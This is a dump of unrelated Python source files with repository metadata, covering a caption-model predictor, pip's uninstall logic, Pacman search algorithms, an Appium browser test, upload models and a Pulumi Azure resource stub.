filename = "missing_version.yaml"
message = "Could not find odml-version"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_invalid_version(self):
filename = "invalid_version.yaml"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(InvalidVersionException):
_ = self.yaml_reader.to_odml(parsed_doc)
| [
"[email protected]"
] | |
56c2fc2b809384b7692cba50dfc269fcf1af96cc | e6f1137903b9658e5e3c1ee51201a931894303b9 | /deepiu/image_caption/algos/history/v1/show_and_tell_predictor.py | 63ca6f464f3d5f17f6249c5f15a71bc02c5e91e1 | [] | no_license | fword/hasky | 8ed69ef85bb34823d9ade27bb3b19aac02872440 | d3c680ffa04f7487b931a5575977798157b42b7e | refs/heads/master | 2021-01-23T01:18:49.275631 | 2017-03-18T13:01:27 | 2017-03-18T13:01:27 | 85,898,744 | 1 | 1 | null | 2017-03-23T02:39:06 | 2017-03-23T02:39:06 | null | UTF-8 | Python | false | false | 4,840 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ==============================================================================
# \file show_and_tell_predictor.py
# \author chenghuige
# \date 2016-09-04 17:50:21.017234
# \Description
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
flags = tf.app.flags
FLAGS = flags.FLAGS
import numpy as np
import melt
import conf
from conf import IMAGE_FEATURE_LEN, TEXT_MAX_WORDS
import vocabulary
import text2ids
from text2ids import idslist2texts
import gezi
from algos.show_and_tell import ShowAndTell
class SeqDecodeMethod():
max_prob = 0
sample = 1
full_sample = 2
beam_search = 3
class ShowAndTellPredictor(ShowAndTell, melt.PredictorBase):
def __init__(self):
#super(ShowAndTellPredictor, self).__init__()
melt.PredictorBase.__init__(self)
ShowAndTell.__init__(self, False)
def init_predict_texts(self, decode_method=0, beam_size=5):
"""
init for generate texts
"""
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.texts = self.build_predict_texts_graph(self.image_feature_place, decode_method, beam_size)
def predict_texts(self, images):
feed_dict = {
self.image_feature_place: images,
}
vocab = vocabulary.get_vocab()
generated_words = self.sess.run(self.texts, feed_dict)
texts = idslist2texts(generated_words)
return texts
def init_predict(self):
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.text = tf.placeholder(tf.int64, [None, TEXT_MAX_WORDS])
self.loss = self.build_predict_graph(self.image_feature_place, self.text)
def predict(self, image, text):
"""
default usage is one single image , single text predict one sim score
"""
feed_dict = {
self.image_feature_place: image.reshape([-1, IMAGE_FEATURE_LEN]),
self.text: text.reshape([-1, TEXT_MAX_WORDS]),
}
loss = self.sess.run(self.loss, feed_dict)
return loss
def bulk_predict(self, images, texts):
"""
input multiple images, multiple texts
outupt:
image0, text0_score, text1_score ...
image1, text0_score, text1_score ...
...
"""
scores = []
for image in images:
stacked_images = np.array([image] * len(texts))
score = self.predict(stacked_images, texts)
scores.append(score)
return np.array(scores)
def build_predict_texts_graph(self, image, decode_method=0, beam_size=5):
"""
@TODO beam search, early stop maybe need c++ op
"""
batch_size = tf.shape(image)[0]
image_emb = tf.matmul(image, self.encode_img_W) + self.encode_img_b
state = self.cell.zero_state(batch_size, tf.float32)
generated_words = []
max_words = TEXT_MAX_WORDS
with tf.variable_scope("RNN"):
(output, state) = self.cell(image_emb, state)
last_word = tf.nn.embedding_lookup(self.emb, tf.zeros([batch_size], tf.int32)) + self.bemb
#last_word = image_emb
for i in range(max_words):
#if i > 0: tf.get_variable_scope().reuse_variables()
tf.get_variable_scope().reuse_variables()
(output, state) = self.cell(last_word, state)
with tf.device('/cpu:0'):
logit_words = tf.matmul(output, self.embed_word_W) + self.embed_word_b
top_prob_words = None
if decode_method == SeqDecodeMethod.max_prob:
max_prob_word = tf.argmax(logit_words, 1)
elif decode_method == SeqDecodeMethod.sample:
max_prob_word = tf.nn.top_k(logit_words, beam_size)[1][:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.full_sample:
top_prob_words = tf.nn.top_k(logit_words, beam_size)[1]
max_prob_word = top_prob_words[:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.beam_search:
raise ValueError('beam search nor implemented yet')
else:
raise ValueError('not supported decode method')
last_word = tf.nn.embedding_lookup(self.emb, max_prob_word) + self.bemb
max_prob_word = tf.reshape(max_prob_word, [batch_size, -1])
if top_prob_words is not None:
generated_words.append(top_prob_words)
else:
generated_words.append(max_prob_word)
generated_words = tf.concat(1, generated_words)
return generated_words
def build_predict_graph(self, image, text):
image = tf.reshape(image, [1, IMAGE_FEATURE_LEN])
text = tf.reshape(text, [1, TEXT_MAX_WORDS])
loss = self.build_graph(image, text, is_tranining=False)
return loss
| [
"[email protected]"
] | |
4e3d7ecbd55853ed72a0d64d4f743af1f873e7b8 | ce4f1810b8011f05f4e9f8b67959b6a2994ac821 | /GAVOCoverage/temp-python/lib/python2.7/site-packages/pip/req/req_uninstall.py | 90a593628d08a707f6d3d9fc6c65406149bd8b5e | [] | no_license | Hyradus/VO_QGIS3.x_plugin | b11d3b18e473861b6d0733c3783c40af6e8eb039 | 9ab9acb4756c415797b5a7e64389978a84a32c23 | refs/heads/master | 2022-04-14T00:25:12.283460 | 2020-04-02T17:18:50 | 2020-04-02T17:18:50 | 248,215,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,937 | py | from __future__ import absolute_import
from builtins import object
import logging
import os
import tempfile
from pip.compat import uses_pycache, WINDOWS, cache_from_source
from pip.exceptions import UninstallationError
from pip.utils import rmtree, ask, is_local, renames, normalize_path
from pip.utils.logging import indent_log
logger = logging.getLogger(__name__)
class UninstallPathSet(object):
"""A set of file paths to be removed in the uninstallation of a
requirement."""
def __init__(self, dist):
self.paths = set()
self._refuse = set()
self.pth = {}
self.dist = dist
self.save_dir = None
self._moved_paths = []
def _permitted(self, path):
"""
Return True if the given path is one we are permitted to
remove/modify, False otherwise.
"""
return is_local(path)
def add(self, path):
head, tail = os.path.split(path)
# we normalize the head to resolve parent directory symlinks, but not
# the tail, since we only want to uninstall symlinks, not their targets
path = os.path.join(normalize_path(head), os.path.normcase(tail))
if not os.path.exists(path):
return
if self._permitted(path):
self.paths.add(path)
else:
self._refuse.add(path)
# __pycache__ files can show up after 'installed-files.txt' is created,
# due to imports
if os.path.splitext(path)[1] == '.py' and uses_pycache:
self.add(cache_from_source(path))
def add_pth(self, pth_file, entry):
pth_file = normalize_path(pth_file)
if self._permitted(pth_file):
if pth_file not in self.pth:
self.pth[pth_file] = UninstallPthEntries(pth_file)
self.pth[pth_file].add(entry)
else:
self._refuse.add(pth_file)
def compact(self, paths):
"""Compact a path set to contain the minimal number of paths
necessary to contain all paths in the set. If /a/path/ and
/a/path/to/a/file.txt are both in the set, leave only the
shorter path."""
short_paths = set()
for path in sorted(paths, key=len):
if not any([
(path.startswith(shortpath) and
path[len(shortpath.rstrip(os.path.sep))] == os.path.sep)
for shortpath in short_paths]):
short_paths.add(path)
return short_paths
def _stash(self, path):
return os.path.join(
self.save_dir, os.path.splitdrive(path)[1].lstrip(os.path.sep))
def remove(self, auto_confirm=False):
"""Remove paths in ``self.paths`` with confirmation (unless
``auto_confirm`` is True)."""
if not self.paths:
logger.info(
"Can't uninstall '%s'. No files were found to uninstall.",
self.dist.project_name,
)
return
logger.info(
'Uninstalling %s-%s:',
self.dist.project_name, self.dist.version
)
with indent_log():
paths = sorted(self.compact(self.paths))
if auto_confirm:
response = 'y'
else:
for path in paths:
logger.info(path)
response = ask('Proceed (y/n)? ', ('y', 'n'))
if self._refuse:
logger.info('Not removing or modifying (outside of prefix):')
for path in self.compact(self._refuse):
logger.info(path)
if response == 'y':
self.save_dir = tempfile.mkdtemp(suffix='-uninstall',
prefix='pip-')
for path in paths:
new_path = self._stash(path)
logger.debug('Removing file or directory %s', path)
self._moved_paths.append(path)
renames(path, new_path)
for pth in list(self.pth.values()):
pth.remove()
logger.info(
'Successfully uninstalled %s-%s',
self.dist.project_name, self.dist.version
)
def rollback(self):
"""Rollback the changes previously made by remove()."""
if self.save_dir is None:
logger.error(
"Can't roll back %s; was not uninstalled",
self.dist.project_name,
)
return False
logger.info('Rolling back uninstall of %s', self.dist.project_name)
for path in self._moved_paths:
tmp_path = self._stash(path)
logger.debug('Replacing %s', path)
renames(tmp_path, path)
for pth in list(self.pth.values()):
pth.rollback()
def commit(self):
"""Remove temporary save dir: rollback will no longer be possible."""
if self.save_dir is not None:
rmtree(self.save_dir)
self.save_dir = None
self._moved_paths = []
class UninstallPthEntries(object):
def __init__(self, pth_file):
if not os.path.isfile(pth_file):
raise UninstallationError(
"Cannot remove entries from nonexistent file %s" % pth_file
)
self.file = pth_file
self.entries = set()
self._saved_lines = None
def add(self, entry):
entry = os.path.normcase(entry)
# On Windows, os.path.normcase converts the entry to use
# backslashes. This is correct for entries that describe absolute
# paths outside of site-packages, but all the others use forward
# slashes.
if WINDOWS and not os.path.splitdrive(entry)[0]:
entry = entry.replace('\\', '/')
self.entries.add(entry)
def remove(self):
logger.debug('Removing pth entries from %s:', self.file)
with open(self.file, 'rb') as fh:
# windows uses '\r\n' with py3k, but uses '\n' with py2.x
lines = fh.readlines()
self._saved_lines = lines
if any(b'\r\n' in line for line in lines):
endline = '\r\n'
else:
endline = '\n'
for entry in self.entries:
try:
logger.debug('Removing entry: %s', entry)
lines.remove((entry + endline).encode("utf-8"))
except ValueError:
pass
with open(self.file, 'wb') as fh:
fh.writelines(lines)
def rollback(self):
if self._saved_lines is None:
logger.error(
'Cannot roll back changes to %s, none were made', self.file
)
return False
logger.debug('Rolling %s back to previous state', self.file)
with open(self.file, 'wb') as fh:
fh.writelines(self._saved_lines)
return True
| [
"[email protected]"
] | |
c5c52a34b30735cf8048a66d5858079d6df8527b | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /vAk9SBqYmj6hXKfrD_16.py | a18522316d4af7072720d687cb474b1b2f6e58b9 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | """
In this challenge, you have to implement a function that returns the given
distance `kilometers` converted into miles. You have to round the result up to
the fifth decimal digit.
### Examples
km_to_miles(2) โ 1.24274
km_to_miles(6) โ 3.72823
km_to_miles(8) โ 4.97097
### Notes
1 kilometer = 0.621371 miles.
"""
def km_to_miles(kilometers):
return round(kilometers * 0.621371, 5)
| [
"[email protected]"
] | |
1955002f06ce2a8c4cb851a8219ebe39c214db28 | 8f0ee068dc5f78491812ee8fec4ecc4ad48be8b5 | /search/search.py | fc18b93f5127bdc5849bdba83db82fd26f0fd190 | [] | no_license | russkingit/Pacman-project-Artificial-Intellengence-python | b36dc48b12f35082b6ac2aac4620d50dec9b3ddf | 553618ed58de51a7c1d1eaa90fb0441dc9d8e34b | refs/heads/master | 2020-04-20T02:27:31.226385 | 2019-02-01T05:03:40 | 2019-02-01T05:03:40 | 168,390,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,893 | py | # search.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
"""
In search.py, you will implement generic search algorithms which are called by
Pacman agents (in searchAgents.py).
"""
import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem.
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state.
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost' is
the incremental cost of expanding to that successor.
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions.
The sequence must be composed of legal moves.
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other maze, the
sequence of moves will be incorrect, so only use this for tinyMaze.
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first.
Your search algorithm needs to return a list of actions that reaches the
goal. Make sure to implement a graph search algorithm.
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print "Start:", problem.getStartState()
print "Is the start a goal?", problem.isGoalState(problem.getStartState())
print "Start's successors:", problem.getSuccessors(problem.getStartState())
"""
"*** YOUR CODE HERE ***"
fringe = util.Stack()
visited = []
path = []
tmpPath = util.Stack() #store path to each succesor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def breadthFirstSearch(problem):
"""Search the shallowest nodes in the search tree first."""
"*** YOUR CODE HERE ***"
fringe = util.Queue()
visited = []
path = []
tmpPath = util.Queue() #store path to each succesor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def uniformCostSearch(problem):
"""Search the node of least total cost first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
tmpPath = util.PriorityQueue() #store path to each succesor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
tmpCost = problem.getCostOfActions(path+ [action])
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
tmpPath = util.PriorityQueue() #store path to each succesor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
tmpCost = problem.getCostOfActions(path+ [action]) + heuristic(successor, problem) #f(n) = g(n) +h(n)
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() ##path to currentState from startState
return path
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
| [
"[email protected]"
] | |
0e04795723c5e4257eec9e7bdd971712e6369da2 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/tintbrowser/testcase/firstcases/testcase7_023.py | fb1e9d767741ee7ec7143ea90c07655d38f16cfe | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,905 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.tint',
'appActivity' : 'org.tint.ui.activities.TintBrowserActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.tint/org.tint.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase023
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BtnAddTab\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Tap to enter an URL or a search.\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BookmarkRow.Thumbnail\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/MenuButton\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
driver.press_keycode(82)
element = getElememtBack(driver, "new UiSelector().text(\"Decline\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Full screen\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/ExitFullScreen\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12tp://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarGoStopReload\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"http://test//test12s//hk.mobi.yahoo.com/\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"7_023\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.tint'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"[email protected]"
] | |
66ae5218e083cec68b52061e500c88077eb68ff4 | 0c95806a805e63a65ce524bac9f2c230c08787dc | /examples/get_temps.py | 18a948ce04c96b2251e7cff05c33435f375c1809 | [
"MIT"
] | permissive | chenchix/melcloud | 4a8e9684e4f38e63871ec543b6a1fdb22fc7628e | 64fe66195ca4e0811391f9b52670ff27954043de | refs/heads/master | 2022-08-16T01:34:40.749190 | 2020-05-29T08:27:40 | 2020-05-29T08:52:47 | 267,796,720 | 0 | 0 | null | 2020-05-29T07:40:36 | 2020-05-29T07:40:36 | null | UTF-8 | Python | false | false | 957 | py | # coding=utf-8
from melcloud import MELCloud
from melcloud.constants import Languages
__author__ = "Gareth Coles"
platform = MELCloud(Languages.EN)
platform.login("<EMAIL ADDRESS>", "<PASSWORD>")
if platform.logged_in:
print(f"Logged in as {platform.account.name}")
platform.load_devices()
for building in platform.buildings:
print(f"Building: {building.id} ({building.name})")
for floor in building.floors:
print(f"> Floor: {floor.id} ({floor.name})")
for device in floor.devices:
print(f">> Device: {device.device_id} ({device.device_name})")
print(f" Zone 1: Currently: {device.room_temperature_zone_1}, Target: {device.set_temperature_zone_1}")
print(f" Zone 2: Currently: {device.room_temperature_zone_2}, Target: {device.set_temperature_zone_2}")
print(f" Current weather: {device.weather_observations[0].condition_name}")
| [
"[email protected]"
] | |
9df24ae01ad33110298fab7d26828948da2c375d | 65148257eabf62c5a60c5a2723792c3549887f49 | /froide/upload/models.py | 9ff7dd6fd021ba5cbe44e90f0ae71f86445b1fb8 | [
"MIT"
] | permissive | infoaed/froide | 083ba5d501f10c29f6f75bc7ae656ebee98fc08c | 532b626e62f6ad3d5017261d305721d00c16cd43 | refs/heads/master | 2021-02-11T17:20:02.449999 | 2020-03-02T17:01:19 | 2020-03-02T17:01:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,279 | py | import json
import os
import tempfile
import uuid
from django.db import models
from django.urls import resolve, Resolver404
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.core.files import File
from django_fsm import FSMField, transition
from .utils import write_bytes_to_file
class states:
INITIAL = 'initial'
RECEIVING = 'receiving'
SAVING = 'saving'
DONE = 'done'
class TusFile(File):
"""
A TUS uploaded file, allow direct move
"""
def temporary_file_path(self):
"""Return the full path of this file."""
return self.file.name
class AbstractUpload(models.Model):
"""
Abstract model for managing TUS uploads
"""
guid = models.UUIDField(_('GUID'), default=uuid.uuid4, unique=True)
state = FSMField(default=states.INITIAL)
upload_offset = models.BigIntegerField(default=0)
upload_length = models.BigIntegerField(default=-1)
upload_metadata = models.TextField(blank=True)
filename = models.CharField(max_length=255, blank=True)
temporary_file_path = models.CharField(max_length=4096, null=True)
expires = models.DateTimeField(null=True, blank=True)
class Meta:
abstract = True
def get_metadata(self):
return json.loads(self.upload_metadata)
def clean_fields(self, exclude=None):
super().clean_fields(exclude=exclude)
if self.upload_offset < 0:
raise ValidationError(_('upload_offset should be >= 0.'))
def write_data(self, upload_bytes, chunk_size):
num_bytes_written = write_bytes_to_file(
self.temporary_file_path,
self.upload_offset,
upload_bytes,
makedirs=True
)
if num_bytes_written > 0:
self.upload_offset += num_bytes_written
self.save()
@property
def size(self):
return self.upload_offset
@property
def content_type(self):
return self.get_metadata().get('filetype')
@property
def name(self):
return self.filename
def delete(self, *args, **kwargs):
if self.temporary_file_exists():
os.remove(self.temporary_file_path)
super().delete(*args, **kwargs)
def get_file(self):
if not self.is_complete():
return None
if self.temporary_file_exists():
return TusFile(open(self.temporary_file_path, 'rb'))
return None
def generate_filename(self):
return os.path.join('{}.bin'.format(uuid.uuid4()))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.filename:
self.filename = self.generate_filename()
return super().save(
force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
def is_complete(self):
return self.upload_offset == self.upload_length
def temporary_file_exists(self):
return self.temporary_file_path and os.path.isfile(self.temporary_file_path)
def get_or_create_temporary_file(self):
if not self.temporary_file_path:
fd, path = tempfile.mkstemp(prefix="tus-upload-")
os.close(fd)
self.temporary_file_path = path
self.save()
assert os.path.isfile(self.temporary_file_path)
return self.temporary_file_path
@transition(field=state, source=states.INITIAL, target=states.RECEIVING, conditions=[temporary_file_exists])
def start_receiving(self):
"""
State transition to indicate the first file chunk has been received successfully
"""
# Trigger signal
# signals.receiving.send(sender=self.__class__, instance=self)
def ensure_saving(self):
if self.state == states.RECEIVING:
self.start_saving()
@transition(field=state, source=states.RECEIVING, target=states.SAVING, conditions=[is_complete])
def start_saving(self):
"""
State transition to indicate that the upload is complete, and that the temporary file will be transferred to
its final destination.
"""
# Trigger signal
# signals.saving.send(sender=self.__class__, instance=self)
@transition(field=state, source=states.SAVING, target=states.DONE)
def finish(self):
"""
State transition to indicate the upload is ready and the file is ready for access
"""
# Trigger signal
class UploadManager(models.Manager):
def get_by_url(self, upload_url, user=None, token=None):
try:
match = resolve(upload_url)
except Resolver404:
return None
guid = match.kwargs.get('guid')
if guid is None:
return None
try:
return Upload.objects.get(
user=user, token=token, guid=guid
)
except Upload.DoesNotExist:
return None
class Upload(AbstractUpload):
user = models.ForeignKey(
get_user_model(), blank=True, null=True,
on_delete=models.CASCADE
)
token = models.UUIDField(null=True, blank=True)
objects = UploadManager()
| [
"[email protected]"
] | |
5536ffabb4a849aff4936655f2c2158c58a21ffe | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/containerinstance/v20170801preview/container_group.py | 31219fad7b37c7ad4b625bd5ec100406e05a516e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,291 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ContainerGroupArgs', 'ContainerGroup']
@pulumi.input_type
class ContainerGroupArgs:
def __init__(__self__, *,
containers: pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]],
os_type: pulumi.Input[Union[str, 'OperatingSystemTypes']],
resource_group_name: pulumi.Input[str],
container_group_name: Optional[pulumi.Input[str]] = None,
image_registry_credentials: Optional[pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]]] = None,
ip_address: Optional[pulumi.Input['IpAddressArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
restart_policy: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]]] = None):
"""
The set of arguments for constructing a ContainerGroup resource.
:param pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]] containers: The containers within the container group.
:param pulumi.Input[Union[str, 'OperatingSystemTypes']] os_type: The operating system type required by the containers in the container group.
:param pulumi.Input[str] resource_group_name: The name of the resource group to contain the container group to be created or updated.
:param pulumi.Input[str] container_group_name: The name of the container group to be created or updated.
:param pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]] image_registry_credentials: The image registry credentials by which the container group is created from.
:param pulumi.Input['IpAddressArgs'] ip_address: The IP address type of the container group.
:param pulumi.Input[str] location: The resource location.
:param pulumi.Input[Union[str, 'ContainerRestartPolicy']] restart_policy: Restart policy for all containers within the container group. Currently the only available option is `always`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: The resource tags.
:param pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]] volumes: The list of volumes that can be mounted by containers in this container group.
"""
pulumi.set(__self__, "containers", containers)
pulumi.set(__self__, "os_type", os_type)
pulumi.set(__self__, "resource_group_name", resource_group_name)
